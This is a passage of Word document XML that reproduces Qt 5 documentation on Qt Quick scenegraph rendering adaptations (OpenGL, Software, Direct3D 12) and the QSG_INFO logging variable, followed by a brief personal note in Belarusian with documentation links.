    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Direct3D 12</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Requested by the string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"d3d12"</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or the enum value</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2108" w:anchor="GraphicsApi-enum" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGRendererInterface::Direct3D12</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When in doubt which</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> backend is in use, enable basic scenegraph information logging via the</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_INFO</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment variable or the</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.general</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logging category. This will result in printing some information during application startup onto the debug output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Adaptations other than OpenGL </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will typically come with a set of limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> since they are unlikely to provide a feature set 100% compatible with OpenGL. However, they may provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>their own specific advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in certain areas. Refer to the sections below for more information on the various adaptations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="008E2997" w:rsidRDefault="00D94480" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1775" w:name="opengl-es-2-0-and-opengl-2-0-adaptation"/>
      <w:bookmarkStart w:id="1776" w:name="_Toc483000915"/>
      <w:bookmarkStart w:id="1777" w:name="_Toc483003906"/>
      <w:bookmarkStart w:id="1778" w:name="_Toc483604258"/>
      <w:bookmarkStart w:id="1779" w:name="_Toc483605478"/>
      <w:bookmarkEnd w:id="1775"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL ES 2.0 and OpenGL 2.0 Adaptation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1776"/>
      <w:bookmarkEnd w:id="1777"/>
      <w:bookmarkEnd w:id="1778"/>
      <w:bookmarkEnd w:id="1779"/>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> adaptation capable of providing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>full Qt Quick 2 feature set</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the OpenGL adaptation. All of the details of the OpenGL adpatation can are available here:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2109" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OpenGL Adaptation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1780" w:name="software-adaptation"/>
      <w:bookmarkStart w:id="1781" w:name="_Toc483000916"/>
      <w:bookmarkStart w:id="1782" w:name="_Toc483003907"/>
      <w:bookmarkStart w:id="1783" w:name="_Toc483604259"/>
      <w:bookmarkStart w:id="1784" w:name="_Toc483605479"/>
      <w:bookmarkEnd w:id="1780"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software Adaptation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1781"/>
      <w:bookmarkEnd w:id="1782"/>
      <w:bookmarkEnd w:id="1783"/>
      <w:bookmarkEnd w:id="1784"/>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Software adaptation is an alternative renderer for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2110" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2 that </w:t>
      </w:r>
      <w:r w:rsidRPr="00450174">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses the raster paint engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to render the contents of the scene graph. The details for this adaptation are available here:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2111" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Software Adaptation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00D94480" w:rsidRDefault="00D94480" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1785" w:name="direct3d-12-experimental"/>
      <w:bookmarkStart w:id="1786" w:name="_Toc483000917"/>
      <w:bookmarkStart w:id="1787" w:name="_Toc483003908"/>
      <w:bookmarkStart w:id="1788" w:name="_Toc483604260"/>
      <w:bookmarkStart w:id="1789" w:name="_Toc483605480"/>
      <w:bookmarkEnd w:id="1785"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Direct3D 12 (experimental)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1786"/>
      <w:bookmarkEnd w:id="1787"/>
      <w:bookmarkEnd w:id="1788"/>
      <w:bookmarkEnd w:id="1789"/>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="008E2997" w:rsidRDefault="00D94480" w:rsidP="00D94480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Direct3D 12 adaptation is an alternative renderer for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2112" w:history="1">
        <w:r w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2 when running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C877AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows 10, both for Win32 and UWP applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00D94480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The details for this adaptation are available here:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2997">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2113" w:history="1">
        <w:r w:rsidRPr="008E2997">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Direct3D 12 Adaptation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2114" w:history="1">
        <w:r w:rsidR="002E0396" w:rsidRPr="00422B75">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations-software.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2115" w:history="1">
        <w:r w:rsidR="002E0396" w:rsidRPr="00422B75">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations-d3d12.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> - тут змешчана інфармацыя аб двух другіх тыпах графічных адаптацый. Я пра гэта не чытаў. Зараз трэба пераўсталяваць </w:t>
      </w:r>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пасля таго як я пабалаваўся з пераменнай </w:t>
      </w:r>
      <w:r w:rsidR="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG</w:t>
      </w:r>
      <w:r w:rsidR="002E0396" w:rsidRPr="002E0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
